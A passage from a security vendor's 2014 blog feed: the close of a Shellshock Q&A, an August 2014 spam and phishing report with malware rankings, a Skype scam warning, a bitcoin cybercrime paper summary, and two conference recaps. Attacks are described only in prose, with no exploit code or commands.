There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system.

How serious is the threat?

This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc. So a patch that helps prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.

Is it the new Heartbleed?

Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting.  By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.

Can it be used in future APT attacks?

It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.

Spam in August 2014

Thu, 09/25/2014 - 07:00
Spam in the spotlight

In August, fraudulent emails exploited global political events and the names of famous people in the Russian Federation. Malicious files were spread via email, including ones that imitated court summons. Spammers who earn money by advertising medications used popular services to attract the attention of recipients. Spammers also actively advertised travel services and collection agencies.

Malicious court summons

In August we registered several mass mailings imitating court summons in various languages. The English-language version informed that the user was being taken to court and should study the case materials to help lodge a defense. Those materials were supposedly in an attachment, which actually contained the Trojan Backdoor.Win32.Kuluoz capable of downloading and running other malware on the victim computer. By comparing several emails from a single mass mailing we confirmed that some details, such as the time, date and venue of the hearing and the names of the archives of malicious files varied from email to email. The sender addresses had been generated from a single template in which the scammers simply entered the words from a pre-determined list. The changes in the text to were intended to provide more individuality and bypass spam filtering.

As well as the English-language versions, similar malicious spam appeared in Russian and Czech. The scammers tried to convince users that they had unpaid debts due within 15 days. If they didn't pay, recipients were warned that their property could be confiscated and their bank accounts frozen.The attached archive contained Trojan-Downloader.Win32.Agent.heva, a malicious file presented by the fraudsters as financial and legal documents. Once the user ran the Trojan, an RTF file was displayed while the malicious program was downloading and installing Trojan.Win32.Tinba.ei, yet another Trojan designed to steal financial information such as bank account credentials and credit card data. The name of the Trojan is an acronym of 'Tinybanker'. This is a small piece of assembler code, but it has the functionalities of many larger pieces of similar malware.

Politics in "Nigerian" spam

In August, we again came across "Nigerian letters" exploiting the events in Ukraine. In the email written in English the scammers used the name of the former President of Ukraine Viktor Yanukovych to sell their story. This time the popular "Nigerian" trick of asking for help in investing money for a substantial reward came from a former financial adviser to the President, whose money had been secretly transferred to the adviser's personal account in London.

After a long silence the name of Mikhail Khodorkovsky was back again. We came across "Nigerian letters" supposedly written on behalf of his inner circle. To trick readers, the fraudsters spun the standard story offering a reward for assistance in transferring and investing huge sums of money. To make the email look more realistic, the body of the message contained the links to official articles about Khodorkovsky. In addition, it was emphasized that all future transactions were legal and did not present any risk to the victim.

One email provides minimal information, simply asking recipients to contact the scammers if they finds the offer interesting. Another email provides details of a tempting offer and stories from Khodorkovsky's life: before the arrest he couldn't withdraw all money out of Russia and now, after the release, he intends to complete the transfer. However as the disgraced billionaire cannot use his former company to do this, he is looking for someone to help him. Interestingly, "Nigerian" scammers enable recipients to unsubscribe from their mailing list by sending an email to the link at the end of the message. This is how the fraudsters collect a database of active e-mail addresses for the future spam mass mailings.

Medication adverts in fake Google Play emails

Spam messages advertising medications regularly offer pills to lose weight, enhance potency or improve the male sex drive. The body of these emails includes a short text with a link to a website of a store where the advertised product can be bought. Sometimes there is just a link. To send out "pharmaceutical" adverts, the fraudsters often use visual spam. However we sometimes see quite unusual tricks to advertise meds. For example, last autumn we wrote in our blog about a series of mailings which used the names of well-known companies and looked just like typical phishing messages. In August 2014, we noted another similar mass mailing.

This time the phishing email looked like a purchase notification from the Google Play app store. To convince the recipient that the email was genuine, the spammers utilized a realistic-looking sender address as well as the store's official logo. Links in the body text of the email, which often lead to pages on the real website, were inactive this time, even though they were highlighted. It seems that the scammers did not think their fake notifications would get through the spam filters so they made their emails look like classic phishing emails.

Spammers' Indian summer

The English-language segment of the Internet saw spam mass mailings offering special offer tours to Hawaii or Costa Rica or tropical forests, as well as the chance to book a private jet for business or pleasure. These messages came from various addresses and contained the links to newly created sites where users could compare the prices and select the most attractive offer.

We also noted mailings offering to participate in earn-online programs. These so-called binary options, offering quick and easy income to cover all the costs of the vacation advertised elsewhere.

How (not) to repay a loan

Another common theme in August's spam was debt managements for individuals and companies. Spammers send out colorful messages urging things like "Only pay what you can afford" and promised to wipe out crippling debts. The hyperlink in the email led to a newly created blank site with a name like "Zero-debt-now" with offers of consolidated loans (i.e. to get one credit for paying several others) or favorable credit terms.

Various collection and private lawyers, meanwhile, offer the opposite: specialized services to collect unpaid debts without slow and costly court proceedings. The advertising emails provided a brief description of the activities of the organization, the details of its work, a few statistics (number of collected loans, the number of satisfied customers, etc.) and included a contact phone number. The digits in the telephone numbers were often deliberately distorted or noised to bypass spam filters. The authors of the messages promised a successful outcome even in cases where other specialized services already have failed.

Statistics The percentage of spam in email traffic

Percentage of spam in email traffic

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The amount of unsolicited email increased throughout the month – in early August the percentage of spam averaged 64.9% while in the end it reached 70.4%.

Sources of spam by country

In August, the USA remained the most popular source of spam (15,9%), up 0.7 percentage points from the previous month. Russia was in second place with 6%; up 0.4 percentage points. China was in third place with 4.7% having produced 0.6 pp less spam than in July.

Sources of spam around the world

Vietnam was in 4th position with 4.7% of all distributed spam; its contribution grew by 1.2 pp which pushed this country up four places in the rankings. It is followed by Argentina (4.4%) which saw little change in its numbers and dropped one place in the table.

Germany (3.6%) remained in 6th place with a slight decrease in the percentage of distributed spam. Ukraine dropped to 8th. Meanwhile, Brazil (2.9%) added 0.5 pp to its previous month's contribution and placed 9th in August's Top 10, which was rounded up with India (2.8%).

Of note is the slight growth of spammer activity in South Korea (1.9%) which also entered the Top 20 in August.

Malicious attachments in email

The graphic below shows the Top 10 malicious programs spread by email in August.

The Top 10 malicious programs spread by email

In August Trojan.JS.Redirector.adf topped the rating of malicious programs most often spread via email. Its name speaks for itself: it is an HTML page containing code that redirects users to a scammer site offering downloads of Binbot, a popular service for automatic online sales of binary options. This malicious program is distributed via email in a ZIP archive which is not password-protected.

Trojan-Downloader.Win32.Upatre.to and Trojan-Downloader.Win32.Upatre.tq were in 3rd and 6th places. These malicious programs are relatively simple, are no more than around 3.5 Kb in size and usually download a Trojan banker from the family known as Dyre/Dyzap/Dyreza. The list of financial organizations targeted by this banker depends on the configuration of the file which is uploaded from the command center.

Trojan-Banker.Win32.Fibbit.rq was fourth. This banking Trojan embeds in Java applications for online banking targeting authentication data and other information, such as keys, transaction replacements and their results.

Backdoor.Win32.Androm.enji and Backdoor.Win32.Androm.erom were fifth and ninth in the ranking. Both malicious programs belong to Andromeda – Gamarue, a universal modular bot with features including downloading, storing and running executable files, downloading DLL (without saving on the disk) and plugins as well as the possibility of self-updating and self-deleting. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.

Trojan.Win32.Bublik.clhs and Trojan.Win32.Bublik.bwbx, modifications of the notorious Bublik malware, ended in 7th and 8th positions in August. The Bublik malware family is mostly used for the unauthorized download and installation of new versions of malware onto victim computers.

Trojan-Spy.Win32.LssLogger.bos rounded off the Top 10. It is a multifunctional malicious program which is capable of stealing passwords from a wide range of software. All stolen information is then passed to the fraudsters via email.

Distribution of email antivirus detections by country

In August, the UK took the lead with 13.16% of all antivirus detections (+6.26 percentage points).  Germany (9.58%, -1.49 percentage points) and the USA (7.69%, -1.59 percentage points) were 2nd and 3rd respectively.

The most unexpected result arrived from Russia: its share grew by 3.33 pp from July and accounted for 6.73% which moved this country from 8th to 4th position in the ranking.

Italy (3.31%) dropped from 5th to 8th place having lost 1.33 percentage points. Hong Kong outran Australia, Turkey and Vietnam with 2.74% of all antivirus detections (+0.28 percentage points).

Special features of malicious spam

In August, the scammers again used fake notifications from Facebook to distribute malicious attachments. This time, users received a message from an unknown address warning them about the possible deactivation of their accounts. According to the text, over the last few days (and in some emails - months) the social network was attacked by hackers. To avoid any problems, the developers asked the users to install the utility attached to the email.

Each email contained a password-protected ZIP archive with an executable file and a unique password needed to unpack it. The attached archive bore the name of the user who the email was addressed (his email account login) and the same name was used to generate a password for the archive. At the end of the email the scammers said that the file could be only opened on a PC running under Microsoft OS. The utility in the archive was in fact a Trojan downloader, a representative of the Trojan-Downloader.Win32.Haze family. This malware downloads other malicious software usually developed to steal the owner's personal data or to send out infected emails to the address on his lists of contacts.

Phishing

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. This considerable growth was probably caused by the summer slowdown in the demand for advertising spam. Fraudsters who do not want to lose their earnings switch to mass phishing mailings.

Australia topped the rating of countries most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. Brazil was 2nd with 19.5% of attacked users. It was followed by the UK (15.2%), Canada (14.6%) and India (14.5%).

The geography of phishing attacks*, August 2014

* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users

Top 10 countries by the percentage of attacked users:

  Country % of users 1 Australia 24.4 2 Brazil 19.5 3 UK 15.2 4 Canada 14.6 5 India 14.5 6 UAE 14.1 7 Ecuador 13.1 8 Dominican Republic 13.0 9 Austria 12.8 10 China 12.7 Targets of attacks by organization

The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.

In August, there was little change among the organizations most often attacked by phishers. Global Internet Portals remained the leading category with 30.8%; its share increased by 1.3 pp. Social networks came second with 17.3%, a 3.3 pp decline from the previous month. These two categories accounted for more than half of all phishing attacks in August.

Organizations most frequently targeted by phishers, by category – August 2014

Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems went down 4.9, 1.2 and 0.6 pp respectively.

Top 3 organizations most frequently targeted by phishers   Organization % detections 1 Google 12.61% 2 Facebook 10.05% 3 Yahoo! 6.38%

In August, Google services were most heavily targeted by phishing links: their share was up 1 pp and had 12.61% of all Anti-Phishing component detections. Second was Facebook, which is traditionally the most popular phishing target. Its contribution increased by 0.4 pp. It is followed by Yahoo! (6.38%). For recap, in July third position was occupied by Windows Live.

In August spam traffic we came across several phishing mailings targeting logins and passwords for Yahoo services! The emails read that Yahoo! administration had registered attempts to enter the user's account from an unidentified device. This activity caused suspicion and the account would be blocked if the recipient did not confirm the username and password on a special page. The body of the email contained two links for verification of the personal data: the first one - to confirm the password and prevent blockage and the second one - to protect the account in case the entry had been performed ​​by anyone else. Both links had the same address and led to the same phishing page. The text of the messages in different mass mailings remained almost unchanged and the design of the emails used the Yahoo! logo.

The phishing page in one mass mailing was an exact copy of the official registration page, but in the other mailing a different background was used.

If you look at the HTML code of the phishing pages, it becomes clear that in the first case the victim's data was sent to the PHP page of the fraudsters while in the second case it was forwarded to an email address registered on a free email service. The HTML code also specified the address which would be entered in the 'From' field as well as the subject of the email. This enabled the fraudsters to identify the information about usernames and passwords received from the users within each mass mailing.

Conclusion

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The rating of the most popular sources of spam remained unchanged from July – the USA (15,9%), Russia (6%) and China (4.7%).

In August, scammers continued to spread "Nigerian letters" calling for help in the fall-out from the crisis in Ukraine. English-language emails supposedly written on behalf of an associate of the former Ukrainian president Viktor Yanukovych asked for assistance in investing money. Mikhail Khodorkovsky's on-going story was yet another pretext used by scammers to lure money from the victims.

Malicious emails imitating court summons were often seen in August's spam traffic. These messages were written in different languages and the attached malicious files were developed both to steal personal information and to extort money for decrypting files on the victims' computers.

To advertise pharmaceutical spam, scammers used fake notifications from the online Google Play store. The links in them led to pages advertising popular medications.

In August, spammers actively promoted the services of travel and debt collection agencies.

August's list of most widely-distributed malware was topped by Trojan.JS.Redirector.adf. The long-term leader Trojan-Spy.HTML.Fraud.gen maintained 2nd position in the rating.

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. Australia was the country most often attacked by phishers: during the month the number of the Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. The Global Internet Portals category remained the sector most frequently targeted by phishers (30.8%). Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. Yahoo! entered the Top 3 organizations most frequently targeted by phishers.

Russian-speaking fraud on Skype

Thu, 09/25/2014 - 03:42

It used to be a common scam: Russian cybercriminals would send an SMS like: "Mom, I'm in trouble. Please, transfer me some funds. I will explain it properly when I get home". A whole bunch of friends and relatives got suckered by this fraud, believing that the message had genuinely come from someone close to them.

Fortunately, Russian mobile operators cracked down hard on this, forcing the criminals to give up. But now they've moved on to Skype. Yesterday I got this Skype message from one of my contacts:

Translation of the text:
Hey. I'm on a trip right now and I can't get to a payment terminal and top up my balance. Could you please transfer 100 rubles – or even better 200 – to the number  +7925XXXXXXX? I can't think of anyone else who could help me. It would really do me a big favor! I pay you back as soon as I get home!!

What happened? The cybercriminals stole my contact's password, probably using password stealing malware. Suddenly, even a Skype account without any money attached is worth something to a crook.

The victim will never see that couple of hundred rubles again. The number mentioned belongs to the cybercriminals, not to the Skype account-holder. It's impossible to say how many people fall victim to this kind of social engineering fraud, but in general we know that social engineering is an effective trick for scammers.

Well, that escalated quickly

Thu, 09/25/2014 - 03:00

An interesting title felt just about right for an interesting topic when I first submitted my research paper about the evolution of bitcoin cybercrime for this year's edition of the Virus Bulletin conference, held in the sleepless Seattle. Discussing the situation from an economic standpoint I aimed to paint a picture reflecting how the present geopolitical situation in Latin America makes the region a fertile ground for bitcoin enthusiasts, and by extension, cybercriminals. It's certainly not easy to capture a snapshot of a phenomena that changes so rapidly and present it to a group of security experts who are already well-informed about the subject. Nevertheless, with the aid of regional statistics, incident timelines and analysis of the most interesting malware samples, there is enough information in the report to give some clear indicators about what's been going on with the world's most popular cryptocurrency this past year, and what we can expect in the future when it comes to bitcoin-related cybercrime.

While some early adopters have been involved in the bitcoin market from the beginning (by means of mining or simply by participating in exchanges), others are just grasping the concept of cryptocurrencies and learning about the perils of bitcoin the hard way – be it in the form of ransomware demanding a quick payment or malicious mining code consuming their limited computing resources. From wallet stealing malware to large scale bitcoin exchange heists, we can find just about anything in the cryptoworld, and this is just the beginning. Nowadays, we talk about malware and cybercrime as two sides of the same (bit)coin, usually referring to organized crews of criminals with clearly defined roles engaging in illegal activities with the sole purpose of financial profit. It makes sense then, to observe the correlation between the number of malware samples in the wild targeting bitcoin users and the price of the currency being exchanged on global markets.

More users, more attacks: Kaspersky Lab stats show a surge in Bitcoin cybercrime

As mentioned in 2013's Kaspersky's Security Bulletin, our predictions for the cybercriminal bitcoin ecosystem came true – and then some: "Attacks on Bitcoin pools, exchanges and Bitcoin users will become one of the most high-profile topics of the year.  Attacks on stock exchanges will be especially popular with the fraudsters as their cost-to-income ratio is very favorable.

As for Bitcoin users, in 2014 we expect considerable growth in the number of attacks targeting their wallets. Previously, criminals infected victim computers and went on to use them for mining. However, this method is now far less effective than before while the theft of Bitcoins promises cybercriminals huge profits and complete anonymity."

It's a long time since we got through a week without one of the major bitcoin exchanges making headline news. We can attribute the success of some attacks to faulty technical implementations of bitcoin wallets, others relied on clever social engineering approaches, and the rest can be blamed on bad business practices and simple negligence about adhering to already proven security standards. There are just too many incidents to list, but there is a common thread uniting them all, which makes them a great body of experience for future generations of bitcoin exchanges to build on.

We have only recently seen why countries like Argentina and Brazil have become a fertile ground for the adoption of a cryptocurrency economy, and as we realize this, so have too cybercriminals. With a whole new set of frauds, scams and threats facing bitcoin holders, citizens need to be aware that keeping their savings secure in no easy task in today's hyper connected world. Because there are no borders for cryptocurrencies, there are none for criminals either, and following the money trail means landing in Latin America, where the general audience is still widely vulnerable to many attacks seen in other parts of the world.

After the Mt. Gox incident we have witnessed targeted phishing campaigns, bitcoin community members moonlighting as private investigators, localized ransomware samples, scams, mobile miners, internet of things devices participating in botnets, and everything else that this digital bitcoin gold rush has brought upon us.

Analysis of, Malware from the Mt. Gox Leak Archive

Being your own bank is more difficult than it seems

Alchemy proved possible for cryptocurrency enthusiasts, turning energy into capital, betting on the success and global adoption of their favorite choice. Seen by outsiders as a hobby for geeks, bitcoin is more than a currency, it's a community that has certain values ingrained and it's revolutionizing the financial world as we currently know it.

Collective but anonymous, organized yet decentralized, this ordered chaos is beginning to make sense after all the problems it has faced. The culling of the excess exchanges that used to be available brings a Darwinian equilibrium to the bitcoin ecosystem, forcing the ones left to implement better business practices and security measures.

Malware trends indicate that cybercriminals are migrating from mining botnets and pools to more direct wallet stealing and exchange credential hijacks. The inefficient mining Trojans working on mobile devices proved that accessing the funds stored in the victim's digital wallet can be much more straightforward than putting the effort into building a massive network of miners that reap minimal gains.

Debit Cards linked to bitcoin wallets are starting to appear and this brings another enticing entry point for criminals. With "bitwashing" services becoming more common, tracking stolen funds will prove much more difficult in the future, exposing the true anonymous nature of cryptocurrencies.

Once the de-facto choice for drug dealers and illegal markets, bitcoin is aiming to gain the global trust of other merchants, hoping that it will have a ready-made community to support it when it becomes the default standard for online and offline transactions. You can read the full paper presented at Virus Bulletin here.

September's 3x CON: Part 2

Wed, 09/24/2014 - 12:00

What, Where & When: The 0x07th edition of SEC-T, an annual Stockholm-based conference, was held on 18-19 September at the stunning Anrika Nalen venue, just a 15 minute walk from the famous Gamla Stan.

The Schedule
This conference features only one track of presentations, which – in my opinion – is quite a good thing, because you don't have to make any difficult choices This year, besides the regular full-time presentations, the agenda included a couple of 30-minute long "small talks" as well as a bunch of lightning talks of 10-20 minutes each.

SEC-T badge

The Talks
The conference kicked off with an excellent speech given by the founder of Recurity Labs, Felix "FX" Lindner, who has proven that an opening keynote doesn't necessarily have to be boring. After lunch, Andreas Lindh presented some really cool attacks on broadband modems, including DNS poisoning and attacks that exploit CSRF vulnerabilities to send or manipulate SMS messages. This was certainly one of my favourite talks, together with the really scary presentation given by Hugo Teso on aviation security. It's terrifying how easily an experienced hacker can exploit aviation protocols and avionics systems to change the on-board system configuration, including changes to the flight path!

The keynote

Amongst other talks, Meredith L. Patterson highlighted some pressing issues concerning the APIs of popular software, but, apparently, not everybody agrees with her highly-critical point of view. At the beginning of the second day, my colleague, David Jacoby, gave an entertaining presentation on how he hacked his home, including successful attacks on his NAS storage, ISP provided router, smart TV and other devices he found connected to the Internet.

Last, but not least, there were also some short but interesting lightning talks from a number of speakers (including myself :)) on topics such as URL parsing, hard drive cryptography and breaking out of the AngularJS sandbox. I did a short presentation about my background research on the current threat landscape for SOHO devices, which turned out to be quite in line with the conference's theme, featuring research on vulnerabilities in the so-called Internet-of-Things.

The Crew

In conclusion, this was a really nice conference, profiting from its one-track only schedule, very high-quality presentations and unique atmosphere. Congrats to the whole SEC-T crew – really good job, guys! And see you all next year!

September's 3x CON: Part 1

Tue, 09/23/2014 - 10:11

What, Where & When: the 4th edition of 44CON, an annual IT Security Conference organized by Sense/Net Ltd, took place on 10-12 September in London, at a venue near the Earl's Court exhibition center. Geeks, who happened to enjoy somewhat spooky historical monuments, could take a five minute walk from the venue to visit an old and impressive cemetery, one of the London's Magnificent Seven.

The Schedule this year was packed with three tracks of (mostly) 1h long presentations within a wide range of topics: from social engineering to exploitation techniques, from crypto-currencies to IoT related threats, to GSM hacking. Some amazing workshops were running simultaneously in rooms that were bearing the familiar names of AES, 2DES and Blowfish.

44CON Badge: BusBlaster v3

This year's Badge is not only extremely handsome, but also may turn out to be very handy, at least for hardware-oriented researchers, as it happens to be a BusBlaster v3 board, especially customized for 44CON (you can find the full specification here). This small cute thingy can be used to program and debug embedded ARM devices.

The Talks
With so many things going on simultaneously, it was impossible to fully attend even a third of them. Moreover, the online schedule didn't include the description of the talks, so in some cases choosing the right track in advance was kind of a lottery. Nevertheless, the overall quality of presentations was so high, that no matter which talks you chose, you always ended up with some new, valuable information.

Joshua J. Drake on the stage

From the selection of very good talks I attended, here are my favourite ones:

  • "Researching Android devices security with the help of a droid army", by Joshua J. Drake (@jduck) in which – in a quite entertaining way – Joshua explained how and why he built his research lab, capable of testing 40+ Android devices at the same time. I was really impressed by the framework Joshua invented for managing his "droid army".
  • "I hunt TR-069 Admins: pwning ISPs like a boss", by Shahar Tal (@jifa). This talk was especially interesting to me, as I'm currently involved in researching threats for small network devices, such as residential gateways (aka SOHO routers), from which a fair share is using the TR-069 protocol to talk to the ISP's Auto Configuration Servers. It turns out (not really surprisingly, if you ask me), that this protocol is poorly secured and highly vulnerable, and might be exploited in a way that could affect a whole set of devices. And the worst thing about it is that the average user can't do much to improve the security of their network, even if they have sufficient knowledge. Most of the responsibility lies with the service providers, together with hardware vendors, who don't seem concerned enough about security issues...
  • "On Her Majesty's Secret Service: GRX and Spy Agency", by Stephen Kho and Rob Kuiters. This quite an intriguing talk on how and why GCHQ hacked the Belgian GRX provider was given by experts from the KPN CISO team and concluded the 2nd day of the conference. The first part of the talk was a technical description of the GRX protocol, it's functionality and weaknesses, and which kind of information can be leaked; in the second part the speakers presented the results of "extensive network scanning" that they conducted during the last several months. It's really scary that there are a lot of devices running vulnerable and *terribly* outdated software on GRX networks.

Socializing at 44CON

The Networking has been made easier with Gin O'Clock, a one-hour break in the afternoon schedule (on both conference days), which was especially dedicated for human interaction and socialization in the intimate atmosphere of the conference bar. A traditional red double-decker bus was there to provide British ale, cider and Pimm's; every attendee was also offered a free glass of gin & tonic.

Some of The Materials have already been published and they are available at Slideshare.

Overall, The Experience was really great and we are looking forward to attending the next 44CON in 2015!